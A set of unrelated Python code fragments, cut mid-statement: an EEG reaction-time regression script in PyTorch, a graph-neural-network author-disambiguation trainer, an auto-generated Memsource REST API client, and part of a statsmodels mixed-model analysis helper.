Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_test.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_test, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
class ToTensor:
# Convert ndarrays to Tensors
def __call__(self, sample): # not it became a callable object
inputs, targets = sample
return torch.from_numpy(inputs), torch.from_numpy(targets)
def reset_weights(m):
'''
Try resetting model weights to avoid
weight leakage.
'''
for layer in m.children():
if hasattr(layer, 'reset_parameters'):
print(f'Reset trainable parameters of layer = {layer}')
layer.reset_parameters()
def initialize_weights(m):
if isinstance(m, nn.Conv2d):
nn.init.kaiming_uniform_(m.weight.data)
print('init xavier uniform %s' % m)
if m.bias is not None:
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight.data, 1)
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.Linear):
print('init xavier uniform %s' % m)
nn.init.kaiming_uniform_(m.weight.data)
nn.init.constant_(m.bias.data, 0)
# %%
############################################################################
################################# starts here ###############################
############################################################################
results = dict() # a results dictionary for storing all the data
subIDs, finalsubIDs = getIDs()
mylist = np.arange(0, len(finalsubIDs))
subj = loadmat('behavior2_task3')['uniquepart'][0].tolist()
############################################
############### set subject ######################
############################################
for s in range(36, 37):
# a results dictionary for storing all the data
subIDs, finalsubIDs = getIDs()
# for i in range(0,1):
torch.manual_seed(seednum)
np.random.seed(seednum)
random.seed(seednum)
# if int(finalsubIDs[s][1:4]) in subj:
# print('in-sample subject')
# else:
# print('no in-sample subject, skipping to the next one>>>')
# continue
# ddmparams = getddmparams(finalsubIDs[s])
ddmparams = loadmat('/home/jenny/pdmattention/sincnet/single_nocond_' + finalsubIDs[s] + '.mat')
alpha, ndt_mcmc, drift = ddmparams['alpha'][0][0][2][0][0],ddmparams['ndt'][0][0][2][0][0],ddmparams['delta'][0][0][2][0][0]
# alpha, ndt, drift = ddmparams
# alpha = 1.39681064
# ndt = 0.39675787
# drift = 0.89709653
# alpha = alpha *2
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
g = torch.Generator()
g.manual_seed(seednum)
subjectstart = mylist[s]
subjectend = subjectstart + 1
####################### define sub #########################################
datadict = loadsubjdict(finalsubIDs[subjectstart])
print(str(subjectstart) + '/' + 'subjectID: ' + finalsubIDs[subjectstart])
data, cond, _, condition, correct = getrtdata(datadict, timestart, timeend)
# response = loadinfo(finalsubIDs[subjectstart])
rtall = condition.copy()
correct = correct.astype('int')
if correctModel is True:
condition = (correct * 2 - 1) * condition
correctind = condition>0
newdata = reshapedata(data).astype('float32')
condition = condition[correctind]
newdata = newdata[correctind,:,:]
cond = cond[correctind]
# # # get rid of the rts that are lower than ndt
# newdata = newdata[rtall>ndt,:,:]
# cond = cond[rtall>ndt]
# correct = correct[rtall>ndt]
# rtall = rtall[rtall>ndt]
#
# condition = condition[condition>ndt]
# # get correct only trials
# newdata=newdata[correct==1,:,:]
# cond = cond[correct==1]
# rtall = rtall[correct==1]
# condition = condition[correct==1]
# X_train000, X_test000, y_train000, y_test000 = train_test_split(newdata, condition, test_size=0.2, random_state=42)
# ndt = np.percentile(y_train000,1)
X_train0, X_test, y_train0, y_test = train_test_split(newdata, condition, test_size=0.2, random_state=42)
ndt = np.min(np.abs(y_train0)) * 0.93
print('MCMC ndt: ', ndt_mcmc)
print('ndt: ', ndt)
X_train00, X_test0, y_train0_cond, y_test_cond = train_test_split(newdata, cond, test_size=0.2, random_state=42)
# ndtint_train = y_train0>ndt
# ndtint_test = y_test> ndt
# X_train0, X_test, y_train0, y_test = X_train0[ndtint_train,:,:], X_test[ndtint_test,:,:], y_train0[ndtint_train], y_test[ndtint_test]
# X_train00, X_test0, y_train0_cond, y_test_cond = X_train00[ndtint_train,:,:], X_test0[ndtint_test,:,:], y_train0_cond[ndtint_train], y_test_cond[ndtint_test]
#
# y_train0 = np.ones_like(y_train0) * drift
# print(X_train0[200, 50, 150])
# print(X_test[24, 50, 150])
train_set = TrDataset(transform=ToTensor())
train_loader = DataLoader(dataset=train_set,
batch_size=batch_size,
shuffle=True, # shuffle the data
num_workers=0, worker_init_fn=seed_worker,
generator=g)
test_set = TestDataset(transform=ToTensor())
test_loader = DataLoader(dataset=test_set,
batch_size=batch_size,
shuffle=False, # shuffle the data
num_workers=0, worker_init_fn=seed_worker,
generator=g)
# sample the data
data, target = next(iter(train_loader))
# plt.plot(data[10,:,:].T)
# plt.show()
data, target = next(iter(test_loader))
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#################################################################################
######################## creating pre training visulization #####################
#################################################################################
targetlist = []
predictedlist = []
plt.rcParams.update({'font.size': 17})
fig = plt.figure(figsize=(18, 9))
gs = GridSpec(2, 4, figure=fig)
ax0 = fig.add_subplot(gs[0, 0])
ax1 = fig.add_subplot(gs[0, 1])
ax2 = fig.add_subplot(gs[1, 0])
ax3 = fig.add_subplot(gs[1, 1])
ax4 = fig.add_subplot(gs[0, 2:])
ax5 = fig.add_subplot(gs[1, 2:])
gradlist = []
model_0 = Sinc_Conv2d_ddm_2param(dropout=dropout_rate).cuda()
model_0.eval()
criterion = nn.MSELoss()
n_total_steps = len(test_loader)
for i, (test_data, test_target) in enumerate(test_loader):
cond_target = y_test_cond[i*batch_size+test_target.shape[0]-test_target.shape[0]:i*batch_size+test_target.shape[0]]
# # test_data, test_target = next(iter(test_loader))
pred, pred_1 = model_0(test_data.cuda())
pred_copy = pred.detach().cpu()
pred.mean().backward()
gradients = model_0.get_activations_gradient_filter()
gradlist.append(gradients)
test_target = torch.squeeze((test_target))
if cond_target.shape[0]==1:
test_target= test_target.view(1, 1)
else:
test_target = test_target.view(test_target.shape[0], 1)
# test_loss = my_loss(test_target.cuda(), pred_copy.cuda(), ndt, alpha,alpha/2, err = 1e-29)
test_loss = my_loss(test_target.cuda(), pred_copy.cuda(), ndt, torch.mean(pred_1.detach().cuda(), axis=0).cuda())
r2 = r2_score(test_target.cpu().detach().numpy(), pred_copy.cpu().detach().numpy())
# print("validation accuracy: ", val_acc)
# print("validation loss: ", val_loss)
# valacc_batch.append(val_acc.cpu())
try:
targetlist += torch.squeeze(test_target).tolist()
predictedlist += torch.squeeze(-pred_copy).cpu().tolist()
except TypeError:
targetlist += [torch.squeeze(test_target).tolist()]
predictedlist += [torch.squeeze(-pred_copy).cpu().tolist()]
print(f'Testing Batch: {i}, Step [{i + 1}/{n_total_steps}], Loss: {test_loss.item():.4f}, R^2 : {r2}')
# if i % 1 == 0:
# plt.plot(test_target, label='target')
# plt.plot(test_output.cpu().detach().numpy(), label='predicted')
# ax0.scatter(test_target, pred_copy.cpu().detach().numpy(), color ='b')
targetlist = np.array(targetlist)
predictedlist = np.array(predictedlist)
# ax0.scatter(targetlist[y_test_cond==1], predictedlist[y_test_cond==1], color='green', marker = 'o', label = 'easy')
# ax0.scatter(targetlist[y_test_cond==2], predictedlist[y_test_cond==2], color='blue', marker = '*', label = 'median')
# ax0.scatter(targetlist[y_test_cond==3], predictedlist[y_test_cond==3], color='red', marker = '^', label = 'hard')
# ax0.legend()
# ax0.set_xlabel('actual RT')
# ax0.set_ylabel('predicted Drift')
ax1.hist(rtall * 1000, bins=12, color='green')
if timestart < 625:
ax1.axvspan(0, (timeend-625)*2, color='cornflowerblue', alpha=0.5)
else:
ax1.axvspan(0, trialdur, color='cornflowerblue', alpha=0.5)
# xt = ax0.get_xticks()
# xt= np.append(xt, trialdur)
# xtl = xt.tolist()
#
# xtl[-1] = [format(trialdur)]
ax1.set_xticks([trialdur])
ax1.set_xticklabels(['window length' + format(trialdur) + 'ms\n' + 'post-stimulus:' + format(2*(timeend-625)) + 'ms'])
if timestart < 625:
fractionrt = sum(rtall * 1000 < (timeend-625)*2) / len(rtall) * 100
else:
fractionrt = sum(rtall * 1000 < trialdur) / len(rtall) * 100
ax1.text(0, ax1.get_ylim()[1] / 3, '%.2f' % fractionrt + '% \nof all\n RTs')
ax1.set_title('Fraction of RT')
# fig.show()
try:
G = torch.abs(torch.cat((gradlist[0], gradlist[1]), axis=0))
except IndexError:
G = torch.abs((gradlist[0]))
g_ij = np.mean(G.cpu().numpy(), axis=(-2, -1))
g_j = np.mean(g_ij, axis=0)
g_scaled = g_j / np.max(g_j)
order = np.argsort(g_scaled)
# r2all = r2_score(targetlist, predictedlist)
# print('r2all', r2all)
# corr_log = scipy.stats.pearsonr(targetlist, predictedlist)
# print('model0 corr log ----: ', corr_log)
# corr_rho = scipy.stats.spearmanr(targetlist, predictedlist)
# targetlist = | |
import sys
from pyHGT.data import *
from pyHGT.model import *
from warnings import filterwarnings
filterwarnings("ignore")
import argparse
parser = argparse.ArgumentParser(description='Training GNN on Author Disambiguation task')
'''
Dataset arguments
'''
parser.add_argument('--data_dir', type=str, default='./dataset/oag_output',
help='The address of preprocessed graph.')
parser.add_argument('--model_dir', type=str, default='./model_save',
help='The address for storing the models and optimization results.')
parser.add_argument('--task_name', type=str, default='AD',
help='The name of the stored models and optimization results.')
parser.add_argument('--cuda', type=int, default=0,
help='Avaiable GPU ID')
parser.add_argument('--domain', type=str, default='_CS',
help='CS, Medicion or All: _CS or _Med or (empty)')
'''
Model arguments
'''
parser.add_argument('--conv_name', type=str, default='hgt',
choices=['hgt', 'gcn', 'gat', 'rgcn', 'han', 'hetgnn'],
help='The name of GNN filter. By default is Heterogeneous Graph Transformer (hgt)')
parser.add_argument('--n_hid', type=int, default=400,
help='Number of hidden dimension')
parser.add_argument('--n_heads', type=int, default=8,
help='Number of attention head')
parser.add_argument('--n_layers', type=int, default=3,
help='Number of GNN layers')
parser.add_argument('--dropout', type=int, default=0.2,
help='Dropout ratio')
parser.add_argument('--sample_depth', type=int, default=6,
help='How many numbers to sample the graph')
parser.add_argument('--sample_width', type=int, default=128,
help='How many `nodes to be sampled per layer per type')
'''
Optimization arguments
'''
parser.add_argument('--optimizer', type=str, default='adamw',
choices=['adamw', 'adam', 'sgd', 'adagrad'],
help='optimizer to use.')
parser.add_argument('--data_percentage', type=int, default=1.0,
help='Percentage of training and validation data to use')
parser.add_argument('--n_epoch', type=int, default=100,
help='Number of epoch to run')
parser.add_argument('--n_pool', type=int, default=4,
help='Number of process to sample subgraph')
parser.add_argument('--n_batch', type=int, default=32,
help='Number of batch (sampled graphs) for each epoch')
parser.add_argument('--repeat', type=int, default=2,
help='How many time to train over a singe batch (reuse data)')
parser.add_argument('--batch_size', type=int, default=256,
help='Number of output nodes for training')
parser.add_argument('--clip', type=int, default=0.25,
help='Gradient Norm Clipping')
args = parser.parse_args()
if args.cuda != -1:
device = torch.device("cuda:" + str(args.cuda))
else:
device = torch.device("cpu")
graph = renamed_load(open(args.data_dir + '/graph%s.pk' % args.domain, 'rb'))
train_range = {t: True for t in graph.times if t != None and t < 2015}
valid_range = {t: True for t in graph.times if t != None and t >= 2015 and t <= 2016}
test_range = {t: True for t in graph.times if t != None and t > 2016}
types = graph.get_types()
apd = graph.edge_list['author']['paper']['rev_AP_write_first']
first_author_dict = {i : True for i in apd if len(apd[i]) >= 2}
name_count = defaultdict(lambda: [])
for i, j in tqdm(graph.node_feature['author'].iterrows(), total = len(graph.node_feature['author'])):
if i in first_author_dict:
name_count[j['name']] += [i]
name_count = {name: name_count[name] for name in name_count if len(name_count[name]) >= 4}
cand_list = list(graph.edge_list['venue']['paper']['PV_Journal'].keys())
def mask_softmax(pred, size):
loss = 0
stx = 0
for l in size:
loss += torch.log_softmax(pred[stx: stx + l], dim=-1)[0] / np.log(l)
stx += l
return -loss
def author_disambiguation_sample(seed, pairs, time_range, batch_size):
'''
sub-graph sampling and label preparation for author disambiguation:
(1) Sample batch_size // 4 number of names
'''
np.random.seed(seed)
names = np.random.choice(list(pairs.keys()), batch_size // 4, replace = False)
'''
(2) Get all the papers written by these same-name authors, and then prepare the label
'''
author_dict = {}
author_info = []
paper_info = []
name_label = []
max_time = np.max(list(time_range.keys()))
for name in names:
author_list = name_count[name]
for a_id in author_list:
if a_id not in author_dict:
author_dict[a_id] = len(author_dict)
author_info += [[a_id, max_time]]
for p_id, author_id, _time in pairs[name]:
paper_info += [[p_id, _time]]
'''
For each paper, create a list: the first entry is the true author's id,
while the others are negative samples (id of authors with same name)
'''
name_label += [[author_dict[author_list[author_id]]] + \
[author_dict[a_id] for (x_id, a_id) in enumerate(author_list) if x_id != author_id]]
'''
(3) Based on the seed nodes, sample a subgraph with 'sampled_depth' and 'sampled_number'
'''
feature, times, edge_list, _, _ = sample_subgraph(graph, time_range, \
inp = {'paper': np.array(paper_info), 'author': np.array(author_info)}, \
sampled_depth = args.sample_depth, sampled_number = args.sample_width)
'''
(4) Mask out the edge between the output target nodes (paper) with output source nodes (author)
'''
masked_edge_list = []
for i in edge_list['paper']['author']['AP_write_first']:
if i[0] >= batch_size:
masked_edge_list += [i]
edge_list['paper']['author']['AP_write_first'] = masked_edge_list
masked_edge_list = []
for i in edge_list['author']['paper']['rev_AP_write_first']:
if i[1] >= batch_size:
masked_edge_list += [i]
edge_list['author']['paper']['rev_AP_write_first'] = masked_edge_list
'''
(5) Transform the subgraph into torch Tensor (edge_index is in format of pytorch_geometric)
'''
node_feature, node_type, edge_time, edge_index, edge_type, node_dict, edge_dict = \
to_torch(feature, times, edge_list, graph)
'''
(6) Prepare the labels for each output target node (paper), and their index in sampled graph.
(node_dict[type][0] stores the start index of a specific type of nodes)
'''
ylabel = {}
for x_id, author_ids in enumerate(name_label):
ylabel[x_id + node_dict['paper'][0]] = np.array(author_ids) + node_dict['author'][0]
return node_feature, node_type, edge_time, edge_index, edge_type, ylabel
def prepare_data(pool):
'''
Sampled and prepare training and validation data using multi-process parallization.
'''
jobs = []
for batch_id in np.arange(args.n_batch):
p = pool.apply_async(author_disambiguation_sample, args=(randint(), \
sel_train_pairs, train_range, args.batch_size))
jobs.append(p)
p = pool.apply_async(author_disambiguation_sample, args=(randint(), \
sel_valid_pairs, valid_range, args.batch_size))
jobs.append(p)
return jobs
train_pairs = {}
valid_pairs = {}
test_pairs = {}
'''
Prepare all the author with same name and their written papers.
'''
for name in name_count:
same_name_author_list = np.array(name_count[name])
for author_id, author in enumerate(same_name_author_list):
for p_id in graph.edge_list['author']['paper']['rev_AP_write_first'][author]:
_time = graph.edge_list['author']['paper']['rev_AP_write_first'][author][p_id]
if type(_time) != int:
continue
if _time in train_range:
if name not in train_pairs:
train_pairs[name] = []
train_pairs[name] += [[p_id, author_id, _time]]
elif _time in valid_range:
if name not in valid_pairs:
valid_pairs[name] = []
valid_pairs[name] += [[p_id, author_id, _time]]
else:
if name not in test_pairs:
test_pairs[name] = []
test_pairs[name] += [[p_id, author_id, _time]]
np.random.seed(43)
'''
Only train and valid with a certain percentage of data, if necessary.
'''
sel_train_pairs = {p : train_pairs[p] for p in np.random.choice(list(train_pairs.keys()), int(len(train_pairs) * args.data_percentage), replace = False)}
sel_valid_pairs = {p : valid_pairs[p] for p in np.random.choice(list(valid_pairs.keys()), int(len(valid_pairs) * args.data_percentage), replace = False)}
'''
Initialize GNN (model is specified by conv_name) and Classifier
'''
gnn = GNN(conv_name = args.conv_name, in_dim = len(graph.node_feature['paper']['emb'].values[0]) + 401, \
n_hid = args.n_hid, n_heads = args.n_heads, n_layers = args.n_layers, dropout = args.dropout,\
num_types = len(graph.get_types()), num_relations = len(graph.get_meta_graph()) + 1).to(device)
matcher = Matcher(args.n_hid).to(device)
model = nn.Sequential(gnn, matcher)
if args.optimizer == 'adamw':
optimizer = torch.optim.AdamW(model.parameters())
elif args.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters())
elif args.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), lr = 0.1)
elif args.optimizer == 'adagrad':
optimizer = torch.optim.Adagrad(model.parameters())
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 1000, eta_min=1e-6)
stats = []
res = []
best_val = 0
train_step = 1500
pool = mp.Pool(args.n_pool)
st = time.time()
jobs = prepare_data(pool)
for epoch in np.arange(args.n_epoch) + 1:
'''
Prepare Training and Validation Data
'''
train_data = [job.get() for job in jobs[:-1]]
valid_data = jobs[-1].get()
pool.close()
pool.join()
'''
After the data is collected, close the pool and then reopen it.
'''
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool)
et = time.time()
print('Data Preparation: %.1fs' % (et - st))
'''
Train (time < 2015)
'''
model.train()
train_losses = []
torch.cuda.empty_cache()
for _ in range(args.repeat):
for node_feature, node_type, edge_time, edge_index, edge_type, ylabel in train_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
author_key = []
paper_key = []
key_size = []
for paper_id in ylabel:
author_ids = ylabel[paper_id]
paper_key += [np.repeat(paper_id, len(author_ids))]
author_key += [author_ids]
key_size += [len(author_ids)]
paper_key = torch.LongTensor(np.concatenate(paper_key)).to(device)
author_key = torch.LongTensor(np.concatenate(author_key)).to(device)
train_paper_vecs = node_rep[paper_key]
train_author_vecs = node_rep[author_key]
res = matcher.forward(train_author_vecs, train_paper_vecs, pair=True)
loss = mask_softmax(res, key_size)
optimizer.zero_grad()
torch.cuda.empty_cache()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
optimizer.step()
train_losses += [loss.cpu().detach().tolist()]
train_step += 1
scheduler.step(train_step)
del res, loss
'''
Valid (2015 <= time <= 2016)
'''
model.eval()
with torch.no_grad():
node_feature, node_type, edge_time, edge_index, edge_type, ylabel = valid_data
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
author_key = []
paper_key = []
key_size = []
for paper_id in ylabel:
author_ids = ylabel[paper_id]
paper_key += [np.repeat(paper_id, len(author_ids))]
author_key += [author_ids]
key_size += [len(author_ids)]
paper_key = torch.LongTensor(np.concatenate(paper_key)).to(device)
author_key = torch.LongTensor(np.concatenate(author_key)).to(device)
valid_paper_vecs = node_rep[paper_key]
valid_author_vecs = node_rep[author_key]
res = matcher.forward(valid_author_vecs, valid_paper_vecs, pair=True)
loss = mask_softmax(res, key_size)
'''
Calculate Valid NDCG. Update the best model based on highest NDCG score.
'''
valid_res = []
ser = 0
for s in key_size:
p = res[ser: ser + s]
l = torch.zeros(s)
l[0] = 1
r = l[p.argsort(descending = True)]
valid_res += [r.cpu().detach().tolist()]
ser += s
valid_ndcg = np.average([ndcg_at_k(resi, len(resi)) for resi in valid_res])
valid_mrr = np.average(mean_reciprocal_rank(valid_res))
if valid_ndcg > best_val:
best_val = valid_ndcg
torch.save(model, os.path.join(args.model_dir, args.task_name + '_' + args.conv_name))
print('UPDATE!!!')
st = time.time()
print(("Epoch: %d (%.1fs) LR: %.5f Train Loss: %.2f Valid Loss: %.2f Valid NDCG: %.4f Valid MRR: %.4f") % \
(epoch, (st-et), optimizer.param_groups[0]['lr'], np.average(train_losses), \
loss.cpu().detach().tolist(), valid_ndcg, valid_mrr))
stats += [[np.average(train_losses), loss.cpu().detach().tolist()]]
del res, loss
del train_data, valid_data
'''
Evaluate the trained model via test set (time > 2016)
'''
best_model = torch.load(os.path.join(args.model_dir, args.task_name + '_' + args.conv_name))
best_model.eval()
gnn, matcher = best_model
with | |
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:<EMAIL>>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class ClientApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_client(self, body, **kwargs): # noqa: E501
"""Create client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_client(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClientEditDto body: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_client_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_client_with_http_info(body, **kwargs) # noqa: E501
return data
def create_client_with_http_info(self, body, **kwargs): # noqa: E501
"""Create client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_client_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClientEditDto body: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_client`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_client(self, client_id, **kwargs): # noqa: E501
"""Delete client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_client(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_client_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.delete_client_with_http_info(client_id, **kwargs) # noqa: E501
return data
def delete_client_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Delete client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_client_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `delete_client`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['clientId'] = params['client_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients/{clientId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_client(self, client_id, **kwargs): # noqa: E501
"""Get client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_client_with_http_info(client_id, **kwargs) # noqa: E501
else:
(data) = self.get_client_with_http_info(client_id, **kwargs) # noqa: E501
return data
def get_client_with_http_info(self, client_id, **kwargs): # noqa: E501
"""Get client # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_client_with_http_info(client_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int client_id: (required)
:return: ClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params or
params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `get_client`") # noqa: E501
collection_formats = {}
path_params = {}
if 'client_id' in params:
path_params['clientId'] = params['client_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/clients/{clientId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_clients(self, **kwargs): # noqa: E501
"""List clients # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_clients(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the Client
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoClientDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_clients_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_clients_with_http_info(**kwargs) # noqa: E501
return data
def list_clients_with_http_info(self, **kwargs): # noqa: E501
"""List clients # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_clients_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Unique name of the Client
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoClientDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_clients" % key
)
params[key] = val
del params['kwargs']
if 'page_number' in params and params['page_number'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_number` when calling `list_clients`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] > 50: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `list_clients`, must be a value less than or equal to `50`") # noqa: E501
if 'page_size' in params and | |
</b> ' + str(X.shape[0]) + '</div>'
header += '<div> <b> Model: </b>' + fit_string + '</div>'
header += '<div> <b> Group: </b> CohortType '
htmls = header + ret.tables[0].to_html() + ret.tables[1].to_html()
return htmls
def crude_binomial_mixedML(df_merged, x_feature, y_feature,covars):
df_merged = df_merged.replace(-9,np.nan).replace('-9',np.nan).replace(999,np.nan).replace(888,np.nan)
if covars == 'False':
data = df_merged[[x_feature,y_feature,'CohortType']].dropna(how = 'any', axis='rows')
data[x_feature] = data[x_feature] + 1
data[y_feature] = data[y_feature].astype(int)
random = {"a": '0 + C(CohortType)'}
fit_string = y_feature + '~' + x_feature
if covars == 'True':
random = {"a": '0 + C(CohortType)'}
data = add_confound(df_merged, x_feature, y_feature)
## create the model string for
fit_string = y_feature + '~'
cnt = 0
## filter out target, at birth, and reference dummy variables in model
for x in data.columns:
#data.drop(['education'], inplace = True, axis = 0)
if x != 'birthWt' and x !='Outcome_weeks' and x!= 'Outcome' and x != 'PIN_Patient' and x != 'SGA' and x != 'LGA' \
and x !='birthLen' and x != 'CohortType' and x != 'race' and x!='race_1' and x!= 'smoking' and x != 'smoking_3' \
and x != 'education_5' and x != 'education':
if cnt == 0:
fit_string += ' ' + x + ' '
else:
fit_string += ' + ' + x + ' '
cnt+=1
data[y_feature] = data[y_feature].astype(int)
## miced linear model with group variable = CohortType
md = statsmodels.genmod.bayes_mixed_glm.BinomialBayesMixedGLM.from_formula(
fit_string, random, data)
##fit the model
